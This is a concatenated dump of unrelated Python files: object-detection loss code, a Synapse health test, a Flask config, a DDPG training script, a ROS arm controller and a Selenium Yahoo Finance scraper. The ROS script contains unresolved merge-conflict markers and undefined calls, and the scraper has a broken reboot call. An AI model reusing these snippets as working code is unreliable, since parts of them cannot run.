torch.zeros_like(box_cls_flatten) class_target[pos_inds, labels_flatten[pos_inds]] = 1 # cls_loss = sigmoid_focal_loss_jit( # box_cls_flatten, # class_target, # alpha=self.focal_loss_alpha, # gamma=self.focal_loss_gamma, # reduction="sum" # ) / num_pos_avg_per_gpu box_regression_flatten = box_regression_flatten[pos_inds] reg_targets_flatten = reg_targets_flatten[pos_inds] anchors_flatten = anchors_flatten[pos_inds] centerness_targets = self.compute_centerness_targets(reg_targets_flatten, anchors_flatten) sum_centerness_targets_avg_per_gpu = reduce_sum(centerness_targets.sum()).item() / float(num_gpus) # qfl score score = torch.zeros(class_target.size()[0], dtype=torch.float32, device=class_target.device) score[pos_inds] = self.compute_iou_score( box_regression_flatten.detach(), reg_targets_flatten, anchors_flatten ) cls_loss = quality_focal_loss( box_cls_flatten, class_target, score, # IoU score weight=1.0, # weight = 1.0 beta=self.focal_loss_gamma, reduction='mean', avg_factor=num_pos_avg_per_gpu, ) if pos_inds.numel() > 0: reg_loss = self.DIoULoss(box_regression_flatten, reg_targets_flatten, anchors_flatten, weight=centerness_targets) / sum_centerness_targets_avg_per_gpu else: reg_loss = box_regression_flatten.sum() return cls_loss, reg_loss * self.cfg.MODEL.ATSS.REG_LOSS_WEIGHT class ATSSPostProcessor(torch.nn.Module): def __init__( self, pre_nms_thresh, pre_nms_top_n, nms_thresh, fpn_post_nms_top_n, min_size, num_classes, box_coder, bbox_aug_enabled=False, ): super(ATSSPostProcessor, self).__init__() self.pre_nms_thresh = pre_nms_thresh self.pre_nms_top_n = pre_nms_top_n self.nms_thresh = nms_thresh self.fpn_post_nms_top_n = fpn_post_nms_top_n self.min_size = min_size self.num_classes = num_classes self.bbox_aug_enabled = bbox_aug_enabled self.box_coder = box_coder def forward_for_single_feature_map(self, box_cls, box_regression, anchors): N, _, H, W = box_cls.shape A = box_regression.size(1) // 4 C = box_cls.size(1) // A # put in the same format as anchors box_cls = permute_and_flatten(box_cls, N, A, C, H, W) box_cls = box_cls.sigmoid() box_regression = permute_and_flatten(box_regression, N, A, 4, H, W) box_regression = box_regression.reshape(N, -1, 4) candidate_inds = box_cls > self.pre_nms_thresh pre_nms_top_n = candidate_inds.view(N, -1).sum(1) pre_nms_top_n = pre_nms_top_n.clamp(max=self.pre_nms_top_n) results = [] for per_box_cls, per_box_regression, per_pre_nms_top_n, per_candidate_inds \ in zip(box_cls, box_regression, pre_nms_top_n, candidate_inds): per_box_cls = per_box_cls[per_candidate_inds] per_box_cls, top_k_indices = per_box_cls.topk(per_pre_nms_top_n, sorted=False) per_candidate_nonzeros = per_candidate_inds.nonzero()[top_k_indices, :] per_box_loc = per_candidate_nonzeros[:, 0] per_class = per_candidate_nonzeros[:, 1] detections = self.box_coder.decode( per_box_regression[per_box_loc, :].view(-1, 4), anchors.tensor[per_box_loc, :].view(-1, 4) ) pred_boxes = Boxes(detections) scores = torch.sqrt(per_box_cls) pred_classes = per_class results.append((pred_boxes, scores, pred_classes)) return results def forward(self, image_sizes, box_cls, box_regression, anchors): sampled_boxes = [] # anchors = list(zip(*anchors)) for _, (o, b, a) in enumerate(zip(box_cls, box_regression, anchors)): sampled_boxes.append( self.forward_for_single_feature_map(o, b, a) ) boxlists = [] for i, image_size in enumerate(image_sizes): boxlist = Instances(image_size) boxes = [] scores = [] classes = [] for j in range(len(anchors)): boxes.append(sampled_boxes[j][i][0]) scores.append(sampled_boxes[j][i][1]) classes.append(sampled_boxes[j][i][2]) boxes = Boxes.cat(boxes) boxes.clip(image_size) keep = boxes.nonempty(self.min_size) boxlist.pred_boxes = boxes[keep] boxlist.scores = torch.cat(scores, dim=0)[keep] boxlist.pred_classes = torch.cat(classes, dim=0)[keep] boxlists.append(boxlist) boxlists = self.select_over_all_levels(boxlists) return boxlists # TODO very similar to filter_results from PostProcessor # but filter_results is per image # TODO Yang: solve this issue in the future. No good solution # right now. def select_over_all_levels(self, boxlists): num_images = len(boxlists) results = [] for i in range(num_images): # multiclass nms result = ml_nms(boxlists[i], self.nms_thresh) number_of_detections = len(result) # Limit to max_per_image detections **over all classes** if number_of_detections > self.fpn_post_nms_top_n > 0: cls_scores = result.scores image_thresh, _ = torch.kthvalue( cls_scores.cpu(), number_of_detections - self.fpn_post_nms_top_n + 1 ) keep = cls_scores >= image_thresh.item() keep = torch.nonzero(keep).squeeze(1) result = result[keep] results.append(result) return results class BoxCoder(object): def __init__(self, cfg): self.cfg = cfg def encode(self, gt_boxes, anchors): if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT': TO_REMOVE = 1 # TODO remove anchors_w = anchors[:, 2] - anchors[:, 0] + TO_REMOVE anchors_h = anchors[:, 3] - anchors[:, 1] + TO_REMOVE anchors_cx = (anchors[:, 2] + anchors[:, 0]) / 2 anchors_cy = (anchors[:, 3] + anchors[:, 1]) / 2 w = self.cfg.MODEL.ANCHOR_GENERATOR.SIZES[0][0] / self.cfg.MODEL.ATSS.FPN_STRIDES[0] l = w * (anchors_cx - gt_boxes[:, 0]) / anchors_w t = w * (anchors_cy - gt_boxes[:, 1]) / anchors_h r = w * (gt_boxes[:, 2] - anchors_cx) / anchors_w b = w * (gt_boxes[:, 3] - anchors_cy) / anchors_h targets = torch.stack([l, t, r, b], dim=1) elif self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'BOX': TO_REMOVE = 1 # TODO remove ex_widths = anchors[:, 2] - anchors[:, 0] + TO_REMOVE ex_heights = anchors[:, 3] - anchors[:, 1] + TO_REMOVE ex_ctr_x = (anchors[:, 2] + anchors[:, 0]) / 2 ex_ctr_y = (anchors[:, 3] + anchors[:, 1]) / 2 gt_widths = gt_boxes[:, 2] - gt_boxes[:, 0] + TO_REMOVE gt_heights = gt_boxes[:, 3] - gt_boxes[:, 1] + TO_REMOVE gt_ctr_x = (gt_boxes[:, 2] + gt_boxes[:, 0]) / 2 gt_ctr_y = (gt_boxes[:, 3] + gt_boxes[:, 1]) / 2 wx, wy, ww, wh = (10., 10., 5., 5.) targets_dx = wx * (gt_ctr_x - ex_ctr_x) / ex_widths targets_dy = wy * (gt_ctr_y - ex_ctr_y) / ex_heights targets_dw = ww * torch.log(gt_widths / ex_widths) targets_dh = wh * torch.log(gt_heights / ex_heights) targets = torch.stack((targets_dx, targets_dy, targets_dw, targets_dh), dim=1) return targets def decode(self, preds, anchors): if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT': TO_REMOVE = 1 # TODO remove anchors_w = anchors[:, 2] - anchors[:, 0] + TO_REMOVE anchors_h = anchors[:, 3] - anchors[:, 1] + TO_REMOVE anchors_cx = (anchors[:, 2] + anchors[:, 0]) / 2 anchors_cy = (anchors[:, 3] + anchors[:, 1]) / 2 w = self.cfg.MODEL.ANCHOR_GENERATOR.SIZES[0][0] / self.cfg.MODEL.ATSS.FPN_STRIDES[0] x1 = anchors_cx - preds[:, 0] / w * anchors_w y1 = anchors_cy - preds[:, 1] / w * anchors_h x2 = anchors_cx + preds[:, 2] / w * anchors_w y2 = anchors_cy + preds[:, 3] / w * anchors_h pred_boxes = torch.stack([x1, y1, x2, y2], dim=1) elif self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'BOX': anchors = anchors.to(preds.dtype) TO_REMOVE = 1 # TODO remove widths = anchors[:, 2] - anchors[:, 0] + TO_REMOVE heights = anchors[:, 3] - anchors[:, 1] + TO_REMOVE ctr_x = (anchors[:, 2] + anchors[:, 0]) / 2 ctr_y = (anchors[:, 3] + anchors[:, 1]) / 2 wx, wy, ww, wh = (10., 10., 5., 5.) dx = preds[:, 0::4] / wx dy = preds[:, 1::4] / wy dw = preds[:, 2::4] / ww dh = preds[:, 3::4] / wh # Prevent sending too large values into torch.exp() dw = torch.clamp(dw, max=math.log(1000. / 16)) dh = torch.clamp(dh, max=math.log(1000. / 16)) pred_ctr_x = dx * widths[:, None] + ctr_x[:, None] pred_ctr_y = dy * heights[:, None] + ctr_y[:, None] pred_w = torch.exp(dw) * widths[:, None] pred_h = torch.exp(dh) * heights[:, None] pred_boxes = torch.zeros_like(preds) pred_boxes[:, 0::4] = pred_ctr_x - 0.5 * (pred_w - 1) pred_boxes[:, 1::4] = pred_ctr_y - 0.5 * (pred_h - 1) pred_boxes[:, 2::4] = pred_ctr_x + 0.5 * (pred_w - 1) pred_boxes[:, 3::4] = pred_ctr_y + 0.5 * (pred_h - 1) return pred_boxes def get_num_gpus(): return int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1 def reduce_sum(tensor): if get_num_gpus() <= 1: return tensor import torch.distributed as dist tensor = tensor.clone() dist.all_reduce(tensor, op=dist.reduce_op.SUM) return tensor def permute_and_flatten(layer, N, A, C, H, W): layer = layer.view(N, -1, C, H, W) layer = layer.permute(0, 3, 4, 1, 2) layer = layer.reshape(N, -1, C) return layer def concat_box_prediction_layers(box_cls, box_regression): box_cls_flattened = [] box_regression_flattened = [] # for each feature level, permute the outputs to make them be in the # same format as the labels. Note that the labels are computed for # all feature levels concatenated, so we keep the same representation # for the objectness and the box_regression for box_cls_per_level, box_regression_per_level in zip( box_cls, box_regression ): N, AxC, H, W = box_cls_per_level.shape Ax4 = box_regression_per_level.shape[1] A = Ax4 // 4 C = AxC // A box_cls_per_level = permute_and_flatten( box_cls_per_level, N, A, C, H, W ) box_cls_flattened.append(box_cls_per_level) box_regression_per_level = permute_and_flatten( box_regression_per_level, N, A, 4, H, W ) box_regression_flattened.append(box_regression_per_level) # concatenate on the first dimension (representing the feature levels), to # take into account the way the labels were generated (with all feature maps # being concatenated as well) box_cls = cat(box_cls_flattened, dim=1).reshape(-1, C) box_regression = cat(box_regression_flattened, dim=1).reshape(-1, 4) return box_cls, box_regression # def make_anchor_generator_atss(config): # anchor_sizes = config.MODEL.ATSS.ANCHOR_SIZES # aspect_ratios = config.MODEL.ATSS.ASPECT_RATIOS # anchor_strides = config.MODEL.ATSS.ANCHOR_STRIDES # straddle_thresh = config.MODEL.ATSS.STRADDLE_THRESH # octave = config.MODEL.ATSS.OCTAVE # scales_per_octave = config.MODEL.ATSS.SCALES_PER_OCTAVE # # assert len(anchor_strides) == len(anchor_sizes), "Only support FPN now" # new_anchor_sizes = [] # for size in anchor_sizes: # per_layer_anchor_sizes = [] # for scale_per_octave in range(scales_per_octave): # octave_scale = octave ** (scale_per_octave / float(scales_per_octave)) # per_layer_anchor_sizes.append(octave_scale * size) # new_anchor_sizes.append(tuple(per_layer_anchor_sizes)) # # anchor_generator = DefaultAnchorGenerator( # { # "sizes": new_anchor_sizes, # "aspect_ratios": aspect_ratios, # "strides": anchor_strides, # "offset": 0.0 # } # ) # return anchor_generator
nilq/baby-python
python
# -*- coding: utf-8 -*- # Copyright 2020 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from synapse.rest.health import HealthResource from tests import unittest class HealthCheckTests(unittest.HomeserverTestCase): def create_test_resource(self): # replace the JsonResource with a HealthResource. return HealthResource() def test_health(self): request, channel = self.make_request("GET", "/health", shorthand=False) self.assertEqual(request.code, 200) self.assertEqual(channel.result["body"], b"OK")
nilq/baby-python
python
#pragma repy # This test tries to do recvmess / stopcomm in a loop def foo(ip,port,mess, ch): print ip,port,mess,ch if callfunc == 'initialize': for x in xrange(0,10): ch = recvmess(getmyip(),<messport>,foo) sleep(.1) stopcomm(ch) sleep(.1)
nilq/baby-python
python
import os from datetime import timedelta class Config(object): DEBUG = False AUTHENTICATED_SEARCH_API = os.environ['AUTHENTICATED_SEARCH_API'] SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL'] CASES_URL = os.environ['CASES_URL'] MATCHING_URL = os.environ['MATCHING_URL'] OWNERSHIP_URL = os.environ['OWNERSHIP_URL'] OS_API_KEY = os.environ['OS_API_KEY'] INTRODUCTION_URL = os.environ['INTRODUCTION_URL'] HISTORIAN_URL = os.environ['HISTORIAN_URL'] REDIS_URL = os.environ['REDIS_URL'] PERMANENT_SESSION_LIFETIME = timedelta(minutes=int(os.environ['PERMANENT_SESSION_LIFETIME'])) WTF_CSRF_ENABLED = True VIEW_COUNT = int(os.environ['VIEW_COUNT']) VIEW_COUNT_ENABLED = os.environ['VIEW_COUNT_ENABLED'] SECRET_KEY = os.environ['SECRET_KEY'] SECURITY_PASSWORD_SALT = SECRET_KEY SECURITY_PASSWORD_HASH = os.environ['SECURITY_PASSWORD_HASH'] # optional and only needed on heroku so get # safely BASIC_AUTH_USERNAME = os.environ.get('BASIC_AUTH_USERNAME') BASIC_AUTH_PASSWORD = os.environ.get('BASIC_AUTH_PASSWORD') class DevelopmentConfig(Config): DEBUG = True WTF_CSRF_ENABLED = False class TestConfig(DevelopmentConfig): TESTING = True VIEW_COUNT_ENABLED = False
nilq/baby-python
python
import gym import random import tensorflow import numpy as np from collections import deque import matplotlib.pyplot as plt import utils.utils as utils import tensorflow as tf from ddpg_tf import DDPG env = gym.make('BipedalWalker-v2') env.seed(0) sess = tf.Session() agent = DDPG('ddpg', utils.load_args(), sess=sess) agent.restore() def ddpg(n_episodes=10000, max_t=1000): scores_deque = deque(maxlen=100) scores = [] for i_episode in range(1, n_episodes+1): state = env.reset() score = 0 for t in range(max_t): action = agent.act(state) next_state, reward, done, _ = env.step(action) agent.step(state, action, reward, next_state, done) state = next_state score += reward if done: break scores_deque.append(score) scores.append(score) average_score = np.mean(scores_deque) print('\rEpisode {}\tAverage Score: {:.2f}\tScore: {:.2f}'.format(i_episode, average_score, score), end="") if i_episode % 100 == 0: print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, average_score)) agent.save() return scores scores = ddpg() fig = plt.figure() ax = fig.add_subplot(111) plt.plot(np.arange(1, len(scores)+1), scores) plt.ylabel('Score') plt.xlabel('Episode #') plt.show()
nilq/baby-python
python
from factory import robot import rospy from std_msgs.msg import Float64 from std_msgs.msg import Bool from geometry_msgs.msg import Point import time as t import math as m t0=t.time() Robot=None class rosact(object): def __init__(self): rospy.init_node('act') self.pubs=[] self.pubs.append(rospy.Publisher('/irb120/joint_1_position_controller/command',Float64,queue_size=10)) self.pubs.append(rospy.Publisher('/irb120/joint_2_position_controller/command',Float64,queue_size=10)) self.pubs.append(rospy.Publisher('/irb120/joint_3_position_controller/command',Float64,queue_size=10)) self.pubs.append(rospy.Publisher('/irb120/joint_4_position_controller/command',Float64,queue_size=10)) self.pubs.append(rospy.Publisher('/irb120/joint_5_position_controller/command',Float64,queue_size=10)) self.pubs.append(rospy.Publisher('/irb120/joint_6_position_controller/command',Float64,queue_size=10)) rospy.sleep(1) def write(self,rob,pos=None): # <<<<<<< HEAD traj_st=time.time() while True: pts=traj_pnt('square',traj_st,pts) pos=rob.IK_bfgs(pts) # ======= try: # while True: x=0.350 z=0.400 y=-0.200#*m.sin(t.time()-t0) pos=rob.iterIK([x,y,z]) # >>>>>>> fe9901f37a59c0681df3eebb48965f692c6aede5 pos=pos[1:] print(pos) #pos=[0]*6 #pos[4]=m.pi/2 # pos[3]=0 # pos[4]=0 # pos[5]=m.pi/2 msg=Float64() print('Writing ') print(pos) for i in range(len(pos)): # msg.data=pos[i]+(t.time()-t0)/180 if i==4 else pos[i] msg.data = pos[i] self.pubs[i].publish(msg) #rospy.sleep(0.01) # <<<<<<< HEAD # def traj_pnt(tr_type,tm,st,vel=0.1,**kwargs): # t=time.time() # assert type(tr_type) is str # if type.lower()=='square': # if st+vel*((t-tm)%` )>kwargs[side]: # ======= except KeyboardInterrupt as e: print('Execution Stopped.') # raise e # >>>>>>> fe9901f37a59c0681df3eebb48965f692c6aede5 def main(): Robot=robot() Robot.BuildKineModules() jts=[0,10,30,0,20,0,0] a=Robot.GetEffectorPosition(jts) # print(a) # print('final pos') print(Robot.SetEffectorPosition(a)*180/m.pi) act=rosact() # <<<<<<< HEAD # act.write(Robot) try: act.write(Robot) except KeyboardInterrupt: print('Execution stopped.') print('this shouldnt be displayed') if __name__== '__main__': main()
nilq/baby-python
python
import time from os import path from collections import defaultdict import pandas as pd from bs4 import BeautifulSoup from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.common.exceptions import TimeoutException, StaleElementReferenceException from utils import tools, COMPANYDIR from crawler.preprocessor import process_summary from localpaths import DOWNLOADPATH, DRIVERPATH, ID, PASSWORD # URLs def signinurl(): return "https://login.yahoo.com/" def summaryurl(t): return f"https://finance.yahoo.com/quote/{t}" def profileurl(t): return f"https://finance.yahoo.com/quote/{t}/profile?p={t}" def statisticsurl(t): return f"https://finance.yahoo.com/quote/{t}/key-statistics?p={t}" def incomestatementurl(t): return f"https://finance.yahoo.com/quote/{t}/financials?p={t}" def balancesheeturl(t): return f"https://finance.yahoo.com/quote/{t}/balance-sheet?p={t}" def cashflowurl(t): return f"https://finance.yahoo.com/quote/{t}/cash-flow?p={t}" def historyurl(t): return f"https://finance.yahoo.com/quote/{t}/history?p={t}" class ChromeDriver: def __init__(self, init, debug, headless=True): self.init = init self.debug = debug self.results = defaultdict(dict) if self.init or self.debug: self.currency_of_last_symbol = None self.last_symbol_is_stock = None self.stocks = [] self.currencys = [] self.timeout = 5 # how many seconds to wait self.max_trial = 3 # how many times to try self.init_driver(headless and not self.init) if self.init: self.signin() def init_driver(self, headless): """Initialize ChromeDriver.""" options = webdriver.ChromeOptions() if headless: options.add_argument("--headless") options.add_argument("--incognito") options.add_argument("--disable-notifications") options.add_argument("--user-agent" \ "=''Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \ " AppleWebKit/537.36 (KHTML, like Gecko)" \ " Chrome/74.0.3729.157 Safari/537.36''") # Disable unnecessary driver tips for speedup # From https://github.com/dinuduke/Selenium-chrome-firefox-tips prefs = {"profile.managed_default_content_settings.images" : 2, "profile.default_content_setting_values.notifications" : 2, "profile.managed_default_content_settings.stylesheets" : 2, "profile.managed_default_content_settings.javascript" : 1, "profile.managed_default_content_settings.plugins" : 1, "profile.managed_default_content_settings.popups" : 2, "profile.managed_default_content_settings.geolocation" : 2, "profile.managed_default_content_settings.media_stream" : 2} if not self.init: # cookie must be enabled to sign in prefs["profile.managed_default_content_settings.cookies"] = 2 options.add_experimental_option("prefs", prefs) self.driver = webdriver.Chrome(DRIVERPATH, options=options) def signin(self): """Sign in to Yahoo Finance using ID and password saved in localpaths.py.""" self.driver.get(signinurl()) # send username WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "input[name='username']"))).send_keys(ID) # click 'Next' WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "input[name='signin']"))).click() # wait til password self.sleep(3) # send password WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "input[name='password']"))).send_keys(PASSWORD) # click submit WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "button[type='submit']"))).click() # wait til log-in self.sleep(3) def reset_last_symbol_info(self): self.stocks.append(self.last_symbol_is_stock) self.currencys.append(self.currency_of_last_symbol) self.last_symbol_is_stock = None self.currency_of_last_symbol = None def reboot(self): """Reboot driver.""" self.driver.quit() self.sleep(600) # rest for 10 minutes self.init_driver() self.signin() def close(self): """Close driver.""" self.driver.close() def quit(self): """Quit driver.""" self.driver.quit() def sleep(self, t=6): """Sleep crawler.""" return time.sleep(t) def parse(self, tr): """Parse row element from table into column and value.""" # choose any char not commonly used splitted = tr.get_text("|").split("|") val = (splitted[-1] if (col := splitted[0]) != "Earnings Date" else "".join(splitted[1:])) return col, val # column, value def save(self, col, symbol, data, sep=",", index_col=0, backup=True): """Save data.""" if not path.exists(dir_ := path.join(COMPANYDIR, symbol)): tools.mkdir(dir_) inpath = tools.get_path(col, symbol) if self.debug: if not path.exists(debugdir := path.join(dir_, "debug")): tools.mkdir(debugdir) inpath = tools.get_path(col, symbol, debug=self.debug) # backup if not self.debug and backup and path.exists(inpath): if not path.exists(backdir := path.join(dir_, "backup")): tools.mkdir(backdir) tools.cp(inpath, tools.get_path(col, symbol, backup=True)) # convert data to df if not isinstance(data, list): data = [data] curdf = pd.DataFrame(data) curdf["Date"] = curdf["Date"].apply(tools.to_date) curdf.set_index("Date", inplace=True) process_summary(curdf) if path.exists(inpath): # concatenate with existing file, remove any duplicate row maindf = tools.path2df(inpath, sep=sep, index_col=index_col) maindf = maindf[maindf.index != tools.get_today()] curdf = pd.concat([curdf, maindf], axis=0) # sort and save curdf.sort_index(ascending=False, inplace=True) curdf.to_csv(inpath, index=True) def is_stock(self): """Return True if corresponding symbol is a stock else False.""" try: # wait until sections are visible WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_all_elements_located(( By.CSS_SELECTOR, "div[id='quote-nav']>ul>li"))) for section in self.driver.find_elements_by_css_selector( "div[id='quote-nav']>ul>li"): if "Financials" in section.text: return True except TimeoutException: return None else: return False def get_currency(self): tmp = WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.CSS_SELECTOR, "section[data-test='qsp-financial']>div>span>span"))).text if "." in tmp: tmp = tmp.split(".")[0].split(" ") # split first sentence return tmp[2] if len(tmp) == 3 else None return "USD" def finished(self, result): """Return True if all elements in result is True else False.""" return sum(result) == len(result) def exist(self, symbol): """Return True if symbol exists, else False.""" self.driver.get(summaryurl(symbol)) # check Summary section try: WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.CSS_SELECTOR, "section[id='lookup-page']>section>div>h2"))) except TimeoutException: self.last_symbol_is_stock = self.is_stock() return True else: self.sleep() return False def mv_downloaded(self, symbol, from_, to_): """Move downloaded file from from_ to to_.""" tools.mv(path.join(DOWNLOADPATH, from_), tools.get_path(to_, symbol, debug=self.debug)) def crawl_summary(self, symbols): """Crawl data to get saved in symbol_summary.csv.""" for symbol in symbols: data = {"Date" : tools.get_today(), "Symbol" : symbol} # [Summary, Statistics] result = [False, False] for _ in range(self.max_trial): if not result[0]: # crawl summary section try: self.driver.get(summaryurl(symbol)) WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_all_elements_located((By.TAG_NAME, "table"))) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: html_content = self.driver.page_source soup = BeautifulSoup(html_content, "html.parser") for table in soup.find_all("table")[:2]: for tr in table.find_all("tr"): col, val = self.parse(tr) data[col] = val result[0] = True self.sleep(3) if not result[1]: try: self.driver.get(statisticsurl(symbol)) WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.ID, "Main"))) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: html_content = self.driver.page_source soup = BeautifulSoup(html_content, "html.parser") for section in soup.find_all( "section", {"data-test":"qsp-statistics"}): for div in section.find_all("div"): children = list(div.children) if len(children) == 2 and children[0].text in { "Stock Price History", "Share Statistics"}: for tr in children[1].find_all("tr"): col, val = self.parse(tr) data[col] = val result[1] = True self.sleep(3) if self.finished(result): break name = "summary" if not self.finished(result): self.results[symbol][name] = result else: self.save(name, symbol, data) def crawl_history(self, symbol): """Crawl historical data. This includes: - Dividend history: symbol_dividend.csv - Stock price history: symbol_history.csv - Stock split history: symbol_stock_split.csv""" def download(): WebDriverWait(self.driver, self.timeout).until( # click arrow EC.element_to_be_clickable(( By.CSS_SELECTOR, "section>div>div>span>a"))).click() self.sleep(3) # wait to download def switch(to_): WebDriverWait(self.driver, self.timeout).until( # click Show EC.element_to_be_clickable(( By.CSS_SELECTOR, "section span>div[data-test='select-container']"))).click() menu = WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.CSS_SELECTOR, "section span>div[data-test='historicalFilter-menu']"))) for d in menu.find_elements_by_tag_name("div"): if d.text == to_: d.click() break WebDriverWait(self.driver, self.timeout).until( #click Apply EC.element_to_be_clickable(( By.CSS_SELECTOR, "section>div>div>button"))).click() self.sleep(3) # wait to load def switch_max(): # click dropdown WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section div[data-test='dropdown']>div"))).click() # click max WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "li>button[data-value='MAX']")) ).click() # wait to load self.sleep(3) global is_max is_max = True if self.last_symbol_is_stock: self.driver.get(historyurl(symbol)) is_max = False # [Historical Prices, Dividends Only, Stock Splits] result = [False, False, False] for _ in range(self.max_trial): downloaded = f"{symbol}.csv" if not result[0]: name = "history" if not self.debug and path.exists(tools.get_path(name, symbol)): result[0] = True else: try: if not is_max: switch_max() # download download() # move summary.csv to data dir self.mv_downloaded(symbol, downloaded, name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[0] = True if not result[1]: name = "Dividends Only" if not self.debug and path.exists(tools.get_path(name, symbol)): result[1] = True else: try: # switch to dividends switch(name) if not is_max: switch_max() # download download() # move divdend.csv to data dir self.mv_downloaded(symbol, downloaded, name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[1] = True if not result[2]: name = "Stock Splits" if not self.debug and path.exists(tools.get_path(name, symbol)): result[2] = True else: try: # switch to dividends switch(name) if not is_max: switch_max() # click download download() # move split.csv to data dir self.mv_downloaded(symbol, downloaded, name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[2] = True if self.finished(result): break self.driver.refresh() if not self.finished(result): self.results[symbol]["history"] = result self.sleep() def crawl_financials(self, symbol): """Crawl financial data. This includes: - Income Statement - Balance Sheet - Cash Flow""" def click_quarterly_and_download(): """Click 'Quarterly' and 'Download'.""" # click Quarterly WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section[data-test='qsp-financial']>div>div>button")) ).click() self.sleep(3) # wait to load # click Download WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section[data-test='qsp-financial'] div>span>button")) ).click() self.sleep(3) # wait to download if self.last_symbol_is_stock: # [Income Statement, Balance Sheet, Cash Flow] result = [False, False, False] for _ in range(self.max_trial): if not result[0]: name = "income_statement" if self.init or self.debug: try: self.driver.get(incomestatementurl(symbol)) self.currency_of_last_symbol = self.get_currency() if not path.exists(tools.get_path(name, symbol)): click_quarterly_and_download() self.mv_downloaded(symbol, f"{symbol}_quarterly_financials.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[0] = True if not result[1]: name = "balance_sheet" if not self.debug and path.exists(tools.get_path(name, symbol)): result[1] = True else: try: self.driver.get(balancesheeturl(symbol)) click_quarterly_and_download() self.mv_downloaded(symbol, f"{symbol}_quarterly_balance-sheet.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[1] = True if not result[2]: name = "cash_flow" if not self.debug and path.exists(tools.get_path(name, symbol)): result[2] = True else: try: self.driver.get(cashflowurl(symbol)) click_quarterly_and_download() self.mv_downloaded(symbol, f"{symbol}_quarterly_cash-flow.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[2] = True if self.finished(result): break if not self.finished(result): self.results[symbol]["financials"] = result self.sleep() def crawl_statistics(self, symbol): """Crawl statistics.csv.""" result = [False, False] data = {} self.driver.get(statisticsurl(symbol)) self.sleep(3) for _ in range(self.max_trial): name = "tmp" if not self.debug and path.exists(tools.get_path(name, symbol)): result[0] = True else: try: WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.ID, "Main"))) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: # crawl statistics with bs4 html_content = self.driver.page_source soup = BeautifulSoup(html_content, "html.parser") for section in soup.find_all( "section", {"data-test":"qsp-statistics"}): for div in section.find_all("div"): children = list(div.children) if len(children) == 2 and children[0].text in { "Fiscal Year", "Profitability", "Management Effectiveness", "Income Statement", "Balance Sheet", "Cash Flow Statement", "Dividends & Splits"}: for tr in children[1].find_all("tr"): col, val = self.parse(tr) data[col] = val self.save(name, symbol, data) result[0] = True name = "statistics" if not self.debug and path.exists(tools.get_path(name, symbol)): result[1] = True else: try: # download quarterly statistics WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section[data-test='qsp-statistics'] div>span>button")) ).click() self.sleep() # move downloaded file to symbol dir self.mv_downloaded(symbol, f"{symbol}_quarterly_valuation_measures.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[1] = True if self.finished(result): break if not self.finished(result): self.results[symbol]["statistics"] = result self.sleep() def crawl_profile_info(self, symbols): """Crawl 'Stock' and 'Currency' columns in stock_profile.csv.""" data = {"Stock" : [False for _ in range(len(symbols))], "Currency" : [None for _ in range(len(symbols))]} for i, symbol in enumerate(symbols): if self.exist(symbol): try: # crawl 'Stock' column is_stock = self.is_stock() self.sleep(3) # crawl 'Currency' column self.driver.get(incomestatementurl(symbol)) currency = self.get_currency() self.sleep(3) except: pass else: data["Stock"][i] = is_stock data["Currency"][i] = currency return data
nilq/baby-python
python
